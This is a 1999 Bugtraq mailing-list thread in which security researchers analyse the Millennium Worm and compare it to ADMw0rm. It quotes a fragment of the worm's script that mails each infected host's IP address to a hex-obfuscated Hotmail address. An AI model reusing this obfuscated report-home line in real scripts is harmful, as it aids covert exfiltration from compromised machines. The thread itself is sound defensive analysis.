Bugtraq: Re: MW

[vision () WHITEHATS COM (Max Vision)]

Hello,

I posted two short write-ups on recent Internet worms I've seen in the wild
(ADMw0rm and Millennium Worm).  http://whitehats.com/worms/.  From these
previous posts it looks like someone has launched a variation of the
Millennium Worm.

Max Vision

At 05:23 PM 9/7/1999 +0200, Adam Morrison wrote:
> > On Wed, 1 Sep 1999, Christian Koderer wrote:
> > > ./IP | mail `printf
> > > "\x62\x65\x75\x72\x70\x40\x68\x6f\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d"`
> > > logout
> > > _EOF_
> >
> > In case no one bothered figuring this one out, this translates to
> > 'beurp () hotmail com'
> >
> > Apparently './IP' is a program it runs to figure out which IP it should
> > get the worm files from. Did you find a similarly named file?
> It's a worm; it gets the worm files from the last infected machine.
> `IP' returns the address of the machine that the copy of the worm
> is running on, and is used in the `cmd' grappling hook which
> apparently gets executed on compromised remote hosts.  Each time the
> worm infects a machine, it mails the IP address of that machine to
> <beurp () hotmail com>.
>
> Now, not to make any unfounded allegations, but this worm looks
> remarkably like ADMw0rm.  I wonder why it restarts named when first
> infecting a host, when it appears to also utilize several other
> vulnerabilites in order to get in.  Ho, hum.